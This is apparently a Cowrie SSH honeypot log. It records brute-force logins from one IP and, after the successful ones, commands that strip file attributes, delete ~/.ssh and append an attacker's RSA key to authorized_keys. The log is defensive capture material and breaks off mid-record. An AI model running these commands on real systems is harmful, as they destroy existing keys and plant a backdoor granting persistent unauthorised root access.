{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:23:23.532160Z","src_ip":"212.227.235.229","session":"6462bad8b379"}
{"eventid":"cowrie.login.success","username":"root","password":"admin123456!","message":"login attempt [root/admin123456!] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:23:25.179733Z","src_ip":"212.227.235.229","session":"6462bad8b379"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:23:26.312702Z","src_ip":"212.227.235.229","session":"6462bad8b379"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:23:26.313375Z","src_ip":"212.227.235.229","session":"6462bad8b379"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:23:26.314216Z","src_ip":"212.227.235.229","session":"6462bad8b379"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:23:26.579991Z","src_ip":"212.227.235.229","session":"6462bad8b379"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:23:27.168531Z","src_ip":"212.227.235.229","session":"6462bad8b379"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:23:27.169204Z","src_ip":"212.227.235.229","session":"6462bad8b379"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:23:27.436196Z","src_ip":"212.227.235.229","session":"6462bad8b379"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:23:27.437162Z","src_ip":"212.227.235.229","session":"6462bad8b379"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57548,"dst_ip":"1.2.3.4","dst_port":22,"session":"ecbb12e776ba","protocol":"ssh","message":"New connection: 212.227.235.229:57548 (1.2.3.4:22) [session: ecbb12e776ba]","sensor":"my-vps","timestamp":"2025-09-09T02:23:27.677444Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:23:27.678843Z","src_ip":"212.227.235.229","session":"ecbb12e776ba"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:23:27.940838Z","src_ip":"212.227.235.229","session":"ecbb12e776ba"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:23:29.016647Z","src_ip":"212.227.235.229","session":"ecbb12e776ba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33974,"dst_ip":"1.2.3.4","dst_port":22,"session":"73a56bc9785c","protocol":"ssh","message":"New connection: 212.227.235.229:33974 (1.2.3.4:22) [session: 73a56bc9785c]","sensor":"my-vps","timestamp":"2025-09-09T02:23:47.708610Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:23:47.709232Z","src_ip":"212.227.235.229","session":"73a56bc9785c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:23:47.792740Z","src_ip":"212.227.235.229","session":"73a56bc9785c"}
{"eventid":"cowrie.login.failed","username":"muhammad","password":"1234567","message":"login attempt [muhammad/1234567] failed","sensor":"my-vps","timestamp":"2025-09-09T02:23:48.168985Z","src_ip":"212.227.235.229","session":"73a56bc9785c"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:23:49.255086Z","src_ip":"212.227.235.229","session":"73a56bc9785c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36270,"dst_ip":"1.2.3.4","dst_port":22,"session":"c70a07a023a5","protocol":"ssh","message":"New connection: 212.227.235.229:36270 (1.2.3.4:22) [session: c70a07a023a5]","sensor":"my-vps","timestamp":"2025-09-09T02:24:01.619875Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:24:01.620862Z","src_ip":"212.227.235.229","session":"c70a07a023a5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:24:01.919141Z","src_ip":"212.227.235.229","session":"c70a07a023a5"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwer4321","message":"login attempt [root/Qwer4321] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:24:03.157311Z","src_ip":"212.227.235.229","session":"c70a07a023a5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:24:03.777001Z","src_ip":"212.227.235.229","session":"c70a07a023a5"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:24:03.777743Z","src_ip":"212.227.235.229","session":"c70a07a023a5"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:24:03.778698Z","src_ip":"212.227.235.229","session":"c70a07a023a5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:24:04.079082Z","src_ip":"212.227.235.229","session":"c70a07a023a5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:24:04.780026Z","src_ip":"212.227.235.229","session":"c70a07a023a5"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:24:04.780713Z","src_ip":"212.227.235.229","session":"c70a07a023a5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:24:05.080981Z","src_ip":"212.227.235.229","session":"c70a07a023a5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:24:05.081888Z","src_ip":"212.227.235.229","session":"c70a07a023a5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37644,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb6b9cf048ed","protocol":"ssh","message":"New connection: 212.227.235.229:37644 (1.2.3.4:22) [session: fb6b9cf048ed]","sensor":"my-vps","timestamp":"2025-09-09T02:24:05.294346Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:24:05.296178Z","src_ip":"212.227.235.229","session":"fb6b9cf048ed"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:24:05.555748Z","src_ip":"212.227.235.229","session":"fb6b9cf048ed"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:24:06.601266Z","src_ip":"212.227.235.229","session":"fb6b9cf048ed"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44692,"dst_ip":"1.2.3.4","dst_port":22,"session":"69f7ae4432b7","protocol":"ssh","message":"New connection: 212.227.235.229:44692 (1.2.3.4:22) [session: 69f7ae4432b7]","sensor":"my-vps","timestamp":"2025-09-09T02:24:07.204892Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:24:07.205646Z","src_ip":"212.227.235.229","session":"69f7ae4432b7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:24:07.580689Z","src_ip":"212.227.235.229","session":"69f7ae4432b7"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:24:07.863453Z","src_ip":"212.227.235.229","session":"fb6b9cf048ed"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39108,"dst_ip":"1.2.3.4","dst_port":22,"session":"63919e157b71","protocol":"ssh","message":"New connection: 212.227.235.229:39108 (1.2.3.4:22) [session: 63919e157b71]","sensor":"my-vps","timestamp":"2025-09-09T02:24:08.118613Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:24:08.120003Z","src_ip":"212.227.235.229","session":"63919e157b71"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:24:08.374937Z","src_ip":"212.227.235.229","session":"63919e157b71"}
{"eventid":"cowrie.login.failed","username":"hacker","password":"pass","message":"login attempt [hacker/pass] failed","sensor":"my-vps","timestamp":"2025-09-09T02:24:09.120741Z","src_ip":"212.227.235.229","session":"69f7ae4432b7"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:24:09.433735Z","src_ip":"212.227.235.229","session":"63919e157b71"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:24:09.688721Z","src_ip":"212.227.235.229","session":"63919e157b71"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:24:09.733289Z","src_ip":"212.227.235.229","session":"c70a07a023a5"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:24:10.501346Z","src_ip":"212.227.235.229","session":"69f7ae4432b7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41724,"dst_ip":"1.2.3.4","dst_port":22,"session":"93fda8460b98","protocol":"ssh","message":"New connection: 212.227.235.229:41724 (1.2.3.4:22) [session: 93fda8460b98]","sensor":"my-vps","timestamp":"2025-09-09T02:24:18.770262Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:24:18.778499Z","src_ip":"212.227.235.229","session":"93fda8460b98"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-g